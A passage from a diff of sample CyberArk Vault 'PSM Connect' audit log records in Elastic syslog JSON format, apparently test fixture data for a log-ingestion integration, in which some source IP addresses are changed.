System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM 
Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM 
Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n 
Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM 
